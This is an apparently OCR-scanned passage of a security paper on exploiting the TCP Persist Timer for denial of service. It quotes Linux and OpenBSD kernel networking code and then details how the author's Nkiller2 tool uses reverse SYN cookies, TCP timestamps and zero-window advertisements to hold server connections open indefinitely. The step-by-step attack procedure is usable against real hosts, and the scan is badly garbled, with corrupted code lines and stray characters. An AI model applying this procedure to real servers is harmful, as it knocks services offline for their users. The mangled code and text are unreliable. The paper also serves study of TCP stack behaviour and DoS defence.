so that at least 2 


are needed to be sent. The first will be acknowledged by us 


advertising a zero window at the same time, and after that, there will 


still be at least 1 packet left in the sender queu 


chance, 


There is also the 


sender even starts 


that we advertise a zero window before th 


sending any data, just after the connection establishment phase, but 
see later that this is not a really good practice. 


we will 


net/ipv4/tcp_output.c: 


/ 

/* This routine writes packets to the network. It advances the 
* send_head. This happens as incoming acks open up the remote 
* window for us. 

* 
* 


Returns 1, if no segments are in flight and w 


have queued segments, 


* but cannot send anything now because of SWS or another problem. 


*/ 


static int tcp_write_xmit (struct sock *sk, 


{ 


int nonagle) 


struct tcp_sock *tp = tcp_sk(sk); 
struct sk_buff *skb; 
unsigned int tso_segs, sent_pkts; 


int 
int 


cwnd_quota; 
result; 


unsigned int mss_now, 


/* If we are closed, the bytes will have to remain here. 


* In time closedown will finish, we empty th 


* all will be happy. 


*/ 
if 


(unlikely (sk->sk_state == TCP_CLOSE) ) 
return 0; 


sent_pkts = 0; 


/* Do MTU probing. */ 


if 


((result = tcp_mtu_probe(sk)) == 0) { 
return 0; 


} else if (result > 0) { 


} 


sent_pkts = 1; 


write queue and 
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while ((skb sk->sk_send_head)) { 
unsigned int limit; 


tso_segs = tcp_init_tso_segs(sk, skb, mss_now); 
BUG_ON(!'!tso_segs) ; 


cwnd_quota = tcp_cwnd_test (tp, skb); 
if (!cwnd_quota) 
break; 


if (unlikely(!tcp_snd_wnd_test (tp, skb, mss_now) ) ) 
break; 


if (tso_segs == 1) { 
if (unlikely(!tcp_nagle_test (tp, skb, mss_now, 
(tcp_skb_is_last(sk, skb) ? 
nonagle : TCP_NAGLE_PUSH) )) ) 


break; 
} else { 
if (tcp_tso_should_defer(sk, tp, skb)) 
break; 
} 
limit = mss_now; 


if (tso_segs > 1) { 
limit = tcp_window_allows (tp, skb, 
mss_now, cwnd_quota); 


if (skb->len < limit) { 
unsigned int trim = skb->len % mss_now; 


if (trim) 
limit = skb->len - trim; 


} 


if (skb->len > limit && 
unlikely (tso_fragment (sk, skb, limit, mss_now) ) ) 
break; 


TCP_SKB_CB(skb)->when = tcp_time_stamp; 


if (unlikely (tcp_transmit_skb(sk, skb, 1, GFP_ATOMIC) )) 
break; 


/* Advance the send_head. This one is sent out. 
* This call will increment packets_out. 
rd 

update_send_head(sk, tp, skb); 


tcp_minshall_update(tp, mss_now, skb); 
sent_pkts+tt; 


} 


if (likely(sent_pkts)) { 
tcp_cwnd_validate(sk, tp); 
return 0; 

} 


return !tp->packets_out && sk->sk_send_head; 


Looking through tcp_write_xmit(), we can deduce that the only way to make 
it return a value different than 0, is by reaching the last line and at 
the same meeting the above two requirements. Consequently, we need to 
break from the while loop before ’sent_pkts’ is increased so that the if 
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condition which calls tcp_cwnd_validate() and then causes the function 
to return 0, fails the check. The key is these two lines: 


if (unlikely(!tcp_snd_wnd_test (tp, skb, mss_now) ) ) 
break; 


tcp_snd_wnd_test() is defined as follows: 


net/ipv4/tcp_output.c 
if \ 


/* Does at least the first segment of SKB fit into the send window? */ 
static inline int tcp_snd_wnd_test (struct tcp_sock *tp, 

struct sk_buff *skb, unsigned int cur_mss) 
{ 

u32 end_seq = TCP_SKB_CB(skb) ->end_seq; 


if (skb->len > cur_mss) 


end_seq = TCP_SKB_CB(skb)->seq + cur_mss; 


return !after(end_seq, tp->snd_una + tp->snd_wnd) ; 


To clarify a few things, here is an excerpt from tcp.h which defines the 
macro ’after’ and the members of struct tcp_skb_cb which are used inside 
tcp_snd_wnd_test(). 


include/net/tcp.h: 
/ \ 


/* 
* The next routines deal with comparing 32 bit unsigned ints 
* and worry about wraparound (automatic with unsigned arithmetic). 


*/ 


static inline int before(__u32 seql, __u32 seq2) 
{ 
return (__s32) (seql-seq2) < 0; 
} 
#define after(seq2, seql) before(seql, seq2) 
[obsess RY: 
struct tcp_skb_cb { 
union { 
struct inet_skb_parm h4; 
if defined(CONFIG_IPV6) || defined (CONFIG_IPV6_MODULE) 
struct inet6_skb_parm h6; 
endif 
} header; /* For incoming frames aA 
__u32 seq; /* Starting sequence number */ 
__u32 end_seq; /* SEQ + FIN + SYN + datalen a7 
PEE 6 et Bef 
__u32 ack_seq; /* Sequence number ACK’d * 
}; 
#define TCP_SKB_CB(__skb) ((struct tcp_skb_cb *)&((__skb)->cb[0]) ) 
\ / 


So, in theory we need the sequence number which is derived from the sum 
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of the current sequence number + the datalength, to be more than the sum 
of the number of unacknowledged data + the send window. A diagram from 
RFC 793 helps clear out some things: 


1 2 3 4 
| | | 
SND.UNA SND .NXT SND.UNA 

+SND .WND 


—- old sequence numbers which have been acknowledged 
sequence numbers of unacknowledged data 
sequence numbers allowed for new data transmission 

— future sequence numbers which are not yet allowed 


mwwN EF 


In practice, the fact the we, as receivers, just advertised a window of 
size 0, makes the snd_wnd 0, which in turn leads the above check in 
succeeding. Things just work by themselves her 


For completeness, we mention that the window is updated by calling the 
function tcp_ack_update_window() (caller is tcp_ack()) which in turns 
updates the tp->snd_wnd variable if the window update is a valid one, 
something which is checked by tcp_may_update_window(). 


net/ipv4/tcp_input.c 
/ \ 


/* Check that window update is acceptable. 
* The function assumes that snd_una<=ack<=snd_next. 
av 
static inline int tcp_may_update_window(const struct tcp_sock *tp, 
const u32 ack, const u32 ack_seg, const u32 nwin) 
{ 
return (after(ack, tp->snd_una) | | 
after(ack_seq, tp->snd_wll) || 
(ack_segq == tp->snd_wll && nwin > tp->snd_wnd) ); 
} 


LE Bae OR. 


/* Update our send window. 
* 


* Window update algorithm, described in RFC793/RFC1122 (used in 

* linux-2.2 and in FreeBSD. NetBSD’s one is even worse.) is wrong. 

yf 

static int tcp_ack_update_window(struct sock *sk, struct tcp_sock *tp, 
struct sk_buff *skb, u32 ack, 
u32 ack_seq) 


int flag = 0; 
u32 nwin = ntohs(skb->h.th->window) ; 


if (likely(!skb->h.th->syn) ) 
nwin <<= tp->rx_opt.snd_wscale; 


if (tcp_may_update_window(tp, ack, ack_seq, nwin)) { 
flag |= FLAG_WIN_UPDATE; 
tcp_update_wl(tp, ack, ack_seq); 


if (tp->snd_wnd != nwin) { 
tp->snd_wnd = nwin; 
PP Seae BY 
} 
} 
tp->snd_una = ack; 


return flag; 
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Let’s now summarize the above with a graphical representation. 


attacker <--—------ data sender 
attacker ---- ACK(data), win0O --> sender 


What happens on the sender sid 


tcp_v4_do_rcv () 
| 
|--> tcp_rcv_established() 


-—-> tcp_ack () 
las tcp_ack_update_window() 
: = tcp_may_update_window () 
ioe tcp_clean_rtx_queue () 
a tcp_ack_packets_out () 
| 


|--> inet_csk_clear_xmit_timer () 


-—-> tcp_data_snd_check () 
= tcp_push_sending_frames () 
fs __tcp_push_sending_frames () 
seg tcp_write_xmit () 
! = tcp_snd_wnd_test () 
= tcp_check_probe_timer () 
| 


|--> inet_csk_reset_xmit_timer () 


Time to move on to the more specific internals of the TCP Persist Timer 
itself. 


----[ 3.3 - Inner workings of Persist Timer 
tcp_probe_timer() is the actual handler for the TCP persist timer so we 


are going to focus on this one for a while. 


net/ipv4/tcp_timer.c 
if \ 


static void tcp_probe_timer (struct sock *sk) 

{ 
struct inet_connection_sock *icsk = inet_csk (sk); 
struct tcp_sock *tp = tcp_sk(sk); 
int max_probes; 


if (tp->packets_out || !sk->sk_send_head) { 
icsk->icsk_probes_out = 0; 
return; 
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*WARNING* RFC 1122 forbids this 


ae 
* 


It doesn’t AFAIK, because we kill the retransmit timer -AK 


FIXME: We ought not to do it, Solaris 2.5 actually has fixing 
this behaviour in Solaris down as a bug fix. [AC] 


Let me to explain. icsk_probes_out is zeroed by incoming ACKs 
even if they advertise zero window. Hence, connection is killed 
only if we received no ACKs for normal connection timeout. It is 
not killed only because window stays zero for some time, window 
may be zero until armageddon and even later. We are in full 
accordance with RFCs, only probe timer combines both 
retransmission timeout and probe timeout in one bottle. --—ANK 

/ 


max_probes = sysctl_tcp_retries2; 


+ + + + + + + FF FF FF F F F FX 


if (sock_flag(sk, SOCK_DEAD)) { 
const int alive = ((icsk->icsk_rto << icsk->icsk_backoff) 
< TCP_RTO_MAX) ; 


max_probes = tcp_orphan_retries(sk, alive); 

if (tcp_out_of_resources(sk, alive || icsk->icsk_probes_out 
<= max_probes) ) 
return; 


} 


if (icsk->icsk_probes_out > max_probes) { 
tcp_write_err(sk); 

} else { 
/* Only send another probe if we didn’t close things up. */ 
tcp_send_probe0 (sk); 


Commenting on the comments, we stand before a kernel developer 
disagreement on whether or not the implementation deviates from RFC 1122 
(Requirements for Internet Hosts - Communication Layers). The most 
outstanding point, however, is this remark: 


"It is not killed only because window stays zero for some time, 
window may be zero until armageddon and even later." 


Indeed, this is part of what we are going to exploit. We shall take 
advantage of a perfectly /’/normal’ TCP behaviour, for our own purpose. 
Let’s see how this works: ’max_probes’ is assigned the value of 
'sysctl_tcp_retries2’ which is actually a userspace-controlled variable 
from /proc/sys/net/ipv4/tcp_retries2 and which usually defaults to 15. 


There are two cases from now on. 

First case: SOCK_DEAD -> The socket is "dead" or "orphan" which usually 
happens when the state of the connection is FIN_WAIT_1 or any other 
terminating state from the TCP state transition diagram (RFC 793). 

In this case, ‘’max_probes’ gets the value from tcp_orphan_retries() which 
is defined as follows: 


net/ipv4/tcp_timer.c: 
/ \ 


/* Calculate maximal number or retries on an orphaned socket. */ 
static int tcp_orphan_retries(struct sock *sk, int alive) 


{ 


int retries = sysctl_tcp_orphan_retries; /* May be zero. */ 
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/* We know from an ICMP that something is wrong. */ 
if (sk->sk_err_soft && !alive) 
retries = 0; 


/* However, if socket sent something recently, select some safe 
* number of retries. 8 corresponds to >100 seconds with minimal 
* RTO of 200msec. */ 

if (retries == 0 && alive) 

retries = 8; 
return retries; 


The ’alive’ variable is calculated from this line: 


const int alive = ((icsk->icsk_rto << icsk->icsk_backoff) 
< TCP_RTO_MAX) ; 


TCP_RTO_MAX is the maximum value the retransmission timeout can get 
and is defined at: 


include/net/tcp.h: 
/ \ 


#define TCP_RTO_MAX ((unsigned) (120*HZ) ) 


\ / 


HZ is the tick rate frequency of the system, which means a period of 

1/HZ seconds is assumed. Regardless of the value of HZ (which is 

varies from one architecture to another), anything that is multiplied 

by it, is transformed to a product of seconds [4]. For example, 120*HZ is 
translated to 120 seconds since we are going to have HZ timer interrupts 
per second. 


Consequently, if the retransmission timeout is less than the maximum 
allowed value of 2 minutes, then ‘alive’ = 1 and tcp_orphan_retries will 
return 8, even if sysctl_tcp_orphan_retries is defined as 0 (which is 
usually the case as one can see from the proc virtual filesystem: 
/proc/sys/net/ipv4/tcp_orphan_retries). Keep in mind, however that the RTO 
(retransmission timeout) is a dynamically computed value, varying when, 
for example, traffic congestion occurs. 


Practically, the case of a socket being dead is when the user application 
has been requested a small amount of data from the peer. It can then write 
the data all at once and issue a close(2) on the socket. This will result 
on a transition from TCP_ESTALISHED to TCP_FIN_WAIT_1. Normally and 
according to RFC 793, the state FIN_WAIT_1 automatically involves sending 
a FIN (doing an active close) to the peer. However Linux breaks the 
official TCP state machine, and will queue this small amount of data, 
sending the FIN only when all of it has been acknowledged. 


net/ipv4/tcp.c: 
/ \ 


void tcp_close(struct sock *sk, long timeout) 


{ 


/* RED-PEN. Formally speaking, we have broken TCP state 
* machine. State transitions: 


* TCP_ESTABLISHED -> TCP_FIN_WAIT1 
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* TCP_SYN_RECV -> TCP_FIN_WAIT1 (forget it, it’s impossible) 
* TCP_CLOSE_WAIT -> TCP_LAST_ACK 
* 
* are legal only when FIN has been sent (i.e. in window), 
* rather than queued out of window. Purists blame. 
* 
* Fre. "RFC state" is ESTABLISHED, 
* if Linux state is FIN-WAIT-1, but FIN is still not sent. 
* Fle. "RFC state" is ESTABLISHED, 
* if Linux state is FIN-WAIT-1, but FIN is still not sent. 
* 
*/ 
I ci Se] 
} 
\ / 


Second Case: socket not dead -> in this case ’max_probes’ keeps having 
the default value from ’tcp_retries2’. 


'icsk->icsk_probes_out’ stores the number of zero window probes so far. 
Its value is compared to /max_probes’ and if greater, tcp_write_err() 


is called, which will shutdown the corresponding socket (TCP_CLOSE state). 
If not, then a zero window probe is sent with tcp_send_probe0(). 


if (icsk->icsk_probes_out > max_probes) { 
tcp_write_err (sk); 

} else { 
/* Only send another probe if we didn’t close things up. */ 
tcp_send_probe0 (sk); 


One important factor here is the ’icsk_probes_out’ "regeneration" which 
takes place whenever we send an ACK, regardless of whether this ACK 
opens the window or keeps it zero. tcp_ack() from tcp_input.c has a 
line which assigns 0 to ’icsk_probes_out’: 


no_queue: 
icsk->icsk_probes_out = 0; 


We mentioned earlier that the TCP Retransmission Timer functionality is 
loosely tied to the Persist Timer. Indeed, the connecting "circle" between 
them is the ’tcp_retries2’ variable. Also, remember the comment from 
above: 


[i® ‘ 
* We are in full accordance with RFCs, only probe timer combines both 
* retransmission timeout and probe timeout in one bottle. -—ANK 


*/ 


tcp_retransmit_timer() calls tcp_write_timeout(), as part of it’s checking 
procedures, which in turns follows a logic similar to the one we saw above 
in the Persist Timer paradigm. We can see that /tcp_retries2’ plays a 
major role here, too. 


net/ipv4/tcp_timer.c: 
/ \ 


/* 
* The TCP retransmit timer. 


*/ 


static void tcp_retransmit_timer(struct sock *sk) 


{ 
[eB Stn KY. 
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if (tcp_write_timeout (sk) ) 
goto out; 


PR GEG EY 


PE ai hae Sf, 


/* A write timeout has occurred. Process the after effects. */ 
static int tcp_write_timeout (struct sock *sk) 


{ 


[ea RY. 
retry_until = sysctl_tcp_retries2; 
if (sock_flag(sk, SOCK_DEAD)) { 
const int alive = (icsk->icsk_rto < TCP_RTO_ MAX) ; 
retry_until = tcp_orphan_retries(sk, alive); 
if (tcp_out_of_resources(sk, alive || icsk->icsk_retransmits 


< retry_until)) 
return 1; 


} 


if (icsk->icsk_retransmits >= retry_until) { 
/* Has it gone just too far? */ 
tcp_write_err (sk); 
return 1; 


The idea of combining the two timer algorithms is also mentioned in RFC 
1122. Specifically, Section 4.2.2.17 - Probing Zero Windows states: 


"This procedure minimizes delay if the zero-window condition is due 
to a lost ACK segment containing a window-opening update. Exponential 
backoff is recommended, possibly with some maximum interval not 
specified here. This procedure is similar to that of the 
retransmission algorithm, and it may be possible to combine the two 
procedures in the implementation." 


In addition, both OpenBSD and FreeBSD follow the notion of the timer 
timeout combination. We can see this from the cod xcerpt below (OpenBSD 
4.4). 


sys/netinet/tcp_timer.c: 


/ \ 


void 
tcp_timer_persist (void *arg) 
{ 
struct tcpcbh *tp = arg; 
uint32_t rto; 
int s; 


s = splsoftnet(); 
if ((tp->t_flags & TF_D 
TCP_TIMER_ISARM 


Et 
by 
Et 
b 


AD) || 
D(tp, TCPT_REXMT)) { 


tcpstat.tcps_persisttimeott; 
/* 


* Hack: if the peer is dead/unreachable, we do not 
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* time out if the window is closed. After a full 
* backoff, drop the connection if the idle time 
* (no responses to probes) reaches the maximum 
* backoff that we would use if retransmitting. 
*/ 
rto = TCP_REXMTVAL (tp) ; 
if (rto < tp->t_rttmin) 
rto = tp->t_rttmin; 
if (tp->t_rxtshift == TCP_MAXRXTSHIFT && 
((tcp_now - tp->t_revtime) >= tcp_maxpersistidle || 
(tcp_now - tp->t_rcevtime) >= rto * tcp_totbackoff)) { 
tcpstat.tcps_persistdroptt; 
tp = tcp_drop(tp, ETIMEDOUT) ; 
goto out; 


} 
tcp_setpersist (tp); 
tp->t_force = 1; 
(void) tcp_output (tp); 
tp->t_force = 0; 

out: 
splx(s); 


This of course doesn’t mean that the timers are connected in any other 
way. In fact, they are mutually exclusive, as when one of them is set 
the other is cleared. 


Summing up, to successfully trigger and later exploit the Persist Timer 
the following prerequisites need to be met: 


a) The amount of data requested needs to be big enough so that the 
userspace application cannot write the data all at once and issue a 
close(2), thus going into FIN_WAIT_1 state and marking the socket as 
SOCK_DEAD. 


b) Assuming the default value of /tcp_retries2’, we need to send 

an ACK (still advertising a 0 window though) at least every less than 
15 persist timer probes. This will be long enough to reset 
'icsk_probes_out’ back to zero and thus avoid the tcp_write_err() 
pitfall. 


c) The zero window advertisement will have to take place immediately 
after acknowledging all the data in transit. This, of course, may include 
piggybacking the ACK of the data, with the window advertisement. 


It is now time to dive into the nitty-gritty details of the attack. 


—--— [ 4 - The attack 


We are going to analyse the attack steps along with a tool that automates 
the whole procedure, Nkiller2. Nkiller2 is a major expansion of the 
original Nkiller I had written some time ago and which was based on the 
idea at [1]. Nkiller2 takes the attack to another level, that we shall 
discuss shortly. 


Sse bf A Kernel memory exhaustion pitfalls 


The idea presented at [1] was, at the time it was published, an almost 
deadly attack. Netkill’s purpose was to exhaust the available kernel 
memory by issuing multiple requests that would go unanswered on the 
receiver’s end as far as the ACKing of the data was concerned. These 
requests would hopefully involve the sending of a small amount of data, 


9.txt Wed Apr 26 09:43:46 2017 18 


such that the user application would write the data all at once, issue 
a close(2) call and move on to serve the rest of the requests. As we 
mentioned before, as long as the application has closed the socket, th 


TCP state is going to become FIN_WAIT_1 in which the socket is marked as 


orphan, meaning it is detached from the userspace and doesn’t anymore clog 


the connection queue. Hence, a rather big number of such requests can be 
made without being concerned that the user application will run out of 
available connection slots. Each request will partially fill the 
corresponding kernel buffers, thus bringing the system down to its knees 
after no more kernel memory is available. 

However, the idea behind Netkill no longer poses a threat to modern 
network stack implementations. Most of them provide mechanisms that 
nullify the attack’s potential by instantly killing any orphan sockets, 
in case of urgent need of memory. For example, Linux calls a specific 
handler, tcp_out_of_recources(), which deals with such situations. 


net/ipv4/tcp_timer.c: 
/ \ 


/* Do not allow orphaned sockets to eat all our resources. 
This is direct violation of TCP specs, but it is required 
to prevent DoS attacks. It is called when a retransmission timeout 


or zero probe timeout occurs on orphaned socket. 


Criteria is still not confirmed experimentally and may change. 
We kill the socket, if: 


+ ££ + FF F F F F 


limit. 
2. If we have strong memory pressure. 


+ 


ate 
static int tcp_out_of_resources (struct sock *sk, int do_reset) 
{ 
struct tcp_sock *tp = tcp_sk (sk); 
int orphans = atomic_read(&tcp_orphan_count) ; 


/* If peer does not open window for long time, or did not transmit 
* anything for long time, penalize it. */ 


1. If number of orphaned sockets exceeds an administratively configured 


if ((s32) (tcp_time_stamp - tp->lsndtime) > 2*TCP_RTO_MAX || !do_reset) 


orphans <<= 1; 


/* T£ some dubious ICMP arrived, penaliz ven more. */ 
if (sk->sk_err_soft) 
orphans <<= 1; 


if (orphans >= sysctl_tcp_max_orphans | | 
(sk->sk_wmem_queued > SOCK_MIN_SNDBUF && 
atomic_read(&tcp_memory_allocated) > sysctl_tcp_mem[2])) { 
if (net_ratelimit()) 
printk (KERN_INFO "Out of socket memory\n"); 


/* Catch exceptional cases, when connection requires reset. 
is 1. Last segment was sent recently. */ 
if ((s32) (tcp_time_stamp - tp->lsndtime) <= TCP_TIMEWAIT_LEN | | 
/* 2. Window is closed. */ 
(!'tp->snd_wnd && !tp->packets_out) ) 
do_reset = 1; 
if (do_reset) 
tcp_send_active_reset (sk, GFP_ATOMIC); 
tcp_done (sk); 
NET_INC_STATS_BH (LINUX_MIB_TCPABORTONMEMORY) ; 
return 1; 


} 


return 0; 
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The comments and the code speak for themselves. tcp_done() moves the 
TCP state to TCP_CLOSE, essentially killing the connection, which will 
probably be in FIN_WAIT_1 state at that time (the tcp_done function is 
also called by tcp_write_err() mentioned above). 


In addition to the above pitfall, the way Netkill works, wastes a lot of 
bandwidth from both sides, making the attack more noticeable and less 
fficient. Netkill sends a flurry of syn packets to the victim, waits for 
he SYNACK and responds by completing the 3way handshake and piggybacking 
he payload request in the current ACK. Since, any data replies from the 
ictim’s user application (usually a web server) will go unanswered, TCP 
ill start retransmitting these packets. These packets, however, are ones 
hat carry a load of data with them, whose size is proportional to the 
initial window and mss advertised. The minimum amount of data is usually 
512 bytes, which given the vast amount of retransmissions that will 
eventually take place, can lead to network congestion, lost packets and 
sysadmin red alarms. 


GES ee 7) Gea 


As we can see, kernel memory exhaustion is not an easily accomplished 
option in today’s operating systems, at least by means of a generic Dos 
attack. The attack vector has to be adapted to current circumstances. 


---- [ 4.2 - Attack Vector 


Our goal is to perform a generic DoS attack that meets the following 
criteria: 

a) The duration of the attack has to be prolonged as long as possible. The 
TCP Persist Timer exploitation extends the duration to infinity. The only 
time limits that will take place will be the ones imposed by the userspace 
application. 


b) No resources will be spent on our part to keep any kind of state 
information from the victim. Any memory resources spent will be O(1), 
which means regardless of the number of probes we send to the victim, our 
own memory needs will never surpass a certain initial amount. 


c) Bandwidth throttling will be kept to a minimum. Traffic congestion has 
to be avoided if possible. 


d) The attack has to affect the availability of both the userspace 
application as well as the kernel, at the extent that this is feasible. 


To meet requirement ’b’, we are going to use a packet-triggering behaviour 
and the, now old, technique of reverse (or client) syn cookies. Basically, 
this means that our answers will strictly depend on nothing else other 
than the packets received from the victim. How is this even possible? We 
are going to use a series of packet-parsing techniques and craft the 
p 
e 


ackets in such a way that they carry within themselves any information 
hat is needed to make decisions. 


The general procedure will go like this: 


- Phase l. 


Attacker sends a group of SYN packets to the victim. In the sequence 
number field, he has encoded a magic number that stems from the 
cryptographic hash of { destination IP & port, source IP & port } anda 
secret key. By this way, he can discern if any SYNACK packet he gets, 
actually corresponds to the SYN packets he just sent. He can accomplish 
that by comparing the (ACK seq number - 1) of the victim’s SYNACK reply 
with the hash of the same packet’s socket quadruple based on the secret 
key. We subtract 1, since the SYN flag occupies one sequence number 

as stated by RFC 793. The above technique is known as reverse syn cookies, 
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since they differ from the usual syn cookies which protect from syn 
flooding, in that they are used from the reverse side, namely the client 
and not the server. Responsible for the cookie calculation and subsequent 
encoding is Nkiller2’s calc_cookie() function. 

Now, apart from the sequence number encoding, we are also going to use a 
nifty facility that TCP provides, as means to our own ends. The TCP 
Timestamp Option is normally used as another way to estimate the RTT. 

The option uses two 32bit fields, ’tsval’ which is a value that increases 
monotonically by the TCP timestamp clock and which is filled in by the 
current sender and ’tsecr’ - timestamp echo reply - which is the peer’s 
echoed value as stated in the tsval of the packet to which the current on 
replies. The host initiating the connection places the option in the 
first SYN packet, by filling tsval with a value, and zeroing tsecr. Only 
if the peer replies with a Timestamp in the SYNACK packet, can any future 
segments keep containing the option. build_timestamp() embeds the 
timestamp option in the crafted TCP header, while get_timestamp() extracts 
it from a packet reply. 


TCP Timestamps Option (TSopt): 
Kind: 8 


Length: 10 bytes 


Kind=8 10 TS Value (TSval) TS Echo Reply (TSecr) 


1 1 4 4 


We are going to use the Timestamp option as a means to track time. We will 
later have to exploit the TCP Persist Timer and eventually answer to some 
of his probes, but this will have to involve calculating how much time has 
passed. Consequently, we are going to encode our own system’s current time 
inside the first ’tsval’. In the SYNACK reply that we are going to get, 
'tsecr’ will reflect that same value. Thus, by subtracting the value 
placed in the echo reply field from the current system time, we can deduce 
how much time has passed since our last packet transmission without 
keeping any stateful information for each probe. We are going to extract 
and encode timestamp information from every packet hereafter. Timestamps 
are supported by every modern network stack implementation, so we aren’t 
going to have any trouble dealing with them. 


—- Phase 2. 


The victim replies with a SYNACK to each of the attacker’s initial SYN 
probes. These kinds of packets are really easy to differentiate between 
the rest of the ones we will be receiving, since no other packet will 
have both the SYN flag and the ACK flag set. In addition, as we noted 
above, we can realize if these packets actually belong to our own probes 
and not some other connection happening at the same time to the host, by 
using the reverse syn cookie technique. 

We have to mention here that under no circumstances should our system’s 
kernel be let to affect any of our connections. Thus, we should take care 
beforehand to have filtered any traffic destined to or coming from the 
victim’s attacked ports. 

Having gotten the victim’s SYNACK replies, we complete the 3way handshake 
by sending the ACK required (send_probe: S_SYNACK). We also piggyback the 
data of the targeted userspace application request. We save bandwidth, 
time and trouble by adopting a perfectly allowable behaviour. Nothing 
else exciting happens here. 


—- Phase 3. 


Now things get a bit more complicated. It is here that the road starts 
forking depending on the target host’s network stack implementation. 
Nkiller2 uses the notion of virtual states, as I called them, which are 


9.txt Wed Apr 26 09:43:46 2017 21 


a way to differentiate between each unique case by parsing the packet 

for relevant information. The handler responsible for parsing the victim’s 
replies and deciding the next virtual state is check_replies(). It sets 
the variable ’state’ accordingly and main() can then deduce inside it’s 
main loop the next course of action, essentially by calling the generic 
send_probe() packet-crafter with the proper state argument and updating 
some of its own loop variables. 


First case: the target host sends a pure ACK (meaning a packet with no 
data), which acknowledges our payload sent in Phase 2. This virtual 

state is mentioned as S_FDACK (State - First Data Acknowledgment) in the 
Nkiller2 codebase. 


Second case: the target host sends the ACK which acknowledged our payload 
from Phase 2, piggybacked with the first data reply of the userspace 
application to which we made the request. This usually happens due to the 
Delayed Acknowledgment functionality according to which, TCP waits some 
time (class of microseconds) to see if there are any data which it can 
send along with an ACK. 


Usually, Linux behaviour follows the first case while *BSD and Windows 
follow the second. The critical question here is when to send the zero 
window advertisement. Ideally, we could reply to the first case’s pure 
ACK with an ACK of our own (with the same acknowledgment number as the 
sequence number in the victim’s packet) that advertised a zero window. 
However, in most cases we won’t have that chance, since the victim’s 
TCP will send, immediately after this pure ACK, the first data of the 
userspace application in a separate segment. Thus, if we advertise a 
zero window when the opposite TCP has already wrote to the network 

the first data, we will fail to trigger the Persist Timer as we saw 
during the analysis in part 3 of this paper. Consequently, we play it 
safe and choose to ignore the FDACK and wait for the first segment of 
data to arrive. 


-— Phase 4 


This stage also differs from one operating system to another, since it 

is deeply connected to Phase 3. For every number mentioned from now on, 
assume that Nkiller’s initial window advertisement and mss is 1024. 

Linux, under normal circumstances, will send two data segments with a 
minimum amount of 512 bytes each. Additionally, any data segment following 
the first one, will have the PUSH flag set. On the other hand, *BSD and 
BSD-derivative implementations will send one bigger data segment of 1024 
bytes, without setting the PUSH flag. 

To be able to take the right decisions for each unique case involved, 
Nkiller2 will have to be provided with a template number. It is trivial to 
identify the different network stacks by using already existing tools, so 
when you are unsure about the target system, either use Nmap’s OS 
fingerprinting capability or at worst, a trial-and-error method. At the 
moment with only 2 different templates (T_LINUX and T_BSDWIN), Nkiller2 

is able to work against a vast amount of systems. 

In the default template (Linux), Nkiller2 is going to send a zero window 
advertisement on the ACK of the second segment (which is going to involve 
acking the first segment as well), while when dealing with BSD or Windows, 
it will send it on the ACK of the first and only data segment. The 
resolving between these two cases takes place in send_probe()’s main body 
in ‘case S_DATA_0’ (State - Data 0, as in first data packet). 


- Phase 5 


Having successfully sent the zero window packet (regardless of how and 
when that happened), the target host’s TCP will start sending zero probes. 
This is where we accomplish meeting requirement ’c’ - bandwidth waste 
limitation. Every retransmission that will take place, will involve pure 
ACKs (Linux) or at maximum 1 byte of data (BSD/Windows). Every zero probe 
is only 52 bytes long, counting TCP/IP headers and the TCP Timestamp 
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option, in contrast with the size of the retransmission packets 

(512 + 40 bytes or 1024 + 40 bytes each) that would take place if we had 
triggered the TCP retransmission timer, as in netkill’s case. 

An interesting issue here is to decide on when is the best time to reply 
to the zero probes, so that the TCP persist timer is ideally prolonged to 
last forever with the fewest packets possible. Using the TCP timestamp 
technique, we can calculate the tim lapsed from the moment we sent th 
zero window advertisement (Since that was our last packet and that one’s 
time value will be echoed in ’tsecr’) to the moment we got the packet. 


check_replies () 


/ \ 


if (get_timestamp(tcp, &tsval, &tsecr)) { 
if (gettimeofday(&now, NULL) < 0) 
fatal ("Couldn’t get time of day\n"); 
time_elapsed = now.tv_sec - tsecr; 
if (o.debug) 
(void) fprintf(stdout, "Time elapsed: %u (sport: %u)\n", 
time_elapsed, sockinfo.sport); 


if (ack == calc_ack && (!datalen || datalen == 1) 
&& time_elapsed >= o.probe_interval) { 
state = S_PROBE; 
goodonet+t; 
break; 


Hence, we can decide on whether or not we should send a reply to the 
current zero probe (S_PROBE), depending on a predetermined rough estimate 
of the time lapse. We also use this ‘’probe_interval’ value to 

differentiate between a zero probe and the FDACK, since there are no other 
packet characteristics, apart from time arrival, that we can take into 
account in this stateless manner. This phase marks the accomplishment of 
our lst goal - prolonging the attack to as much as possible. 


A graphical representation of the procedure is shown below. Remember that 
the states are purely virtual. We do not keep any kind of information on 
our part. 


(cookie OK) 
SYN > S_SYNACK 
rcv SYNACK 


ACK SYNACK 
send request 
pure ACK 
> S_FDACK 
time_elapsed < 

probe_interval ignore 

got Data 

V 
S_DATA_0 


| 
/ \ 
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| 
| 
| 
V 
ACK (data0O) & 


send 0 windo 


/ \ 
T_BSDWIN / \ T_LINUX (default) 
/ \ 
got Data (PSH) 
ACK (data0) 
V 
WwW S_DATA_1 
\ / ACK(datal) & send 0 window 
\ / 
\ / 
yf 


> 


time_elapsed >= probe_interval 


a 
vy 
ce 
) 
wo 
eal 


eee eee > send probe reply 


The only thing that still needs to be answered is to what extent we hav 


achieved goal 
it depends on 
will usually 1 


‘da’. How efficient is the attack really? The answer is, that 
what we are attacking. Attacking one userspace application 
ead to either backlog queue collapse or reaching the maximum 


allowable number of concurrent accepted connections. In both cases, the 


availability of the userspace application will drop down to zero and will 
stay in that condition for a possibly unlimited amount of time. Keep in 
mind though that robust server applications like Apache have a Timeout of 


their own, whi 


ch is independent of TCP’s. Quoting from Apache’s manual: 


"The TimeOut directive currently defines the amount of time Apache will 


wait for t 


hree things: 


1. The total amount of time it takes to receive a GET request. 
2. The amount of time between receipt of TCP packets on a POST or PUT 


reques 


t. 


3. The amount of time between ACKs on transmissions of TCP packets in 
responses." 


By default, Apache httpd’s TimeOut = 300 which means 5 minutes. Following 
a Similar approach, lighttpd’s default timeout is about 6 minutes. 


Even then, as 
-n0O), there is 


long as the attack cycle continues (Hint: Nkiller’s option 
no hope for any server not protected by a stateful firewall 


that limits the total number of packets reaching the host (which still 


won’t be enough by itself given the 


At the same ti 


[CP Persist Timer’s exploitation). 


me, useful kernel resources are wasted on the SendQueue of 


each established connection. However, for kernel memory exhaustion to 


occur, we will 
applications ( 
the amount of 
of the attacke 
each of them. 
reason or anot 
memory with a 


s--> \[ 4,3> Tés 


Time for some 


Nkiller2 exploits the Persist 


point out th 


have to perform a concurrent attack at multiple 
Nkiller2 isn’t optimized for this though). By this way, 
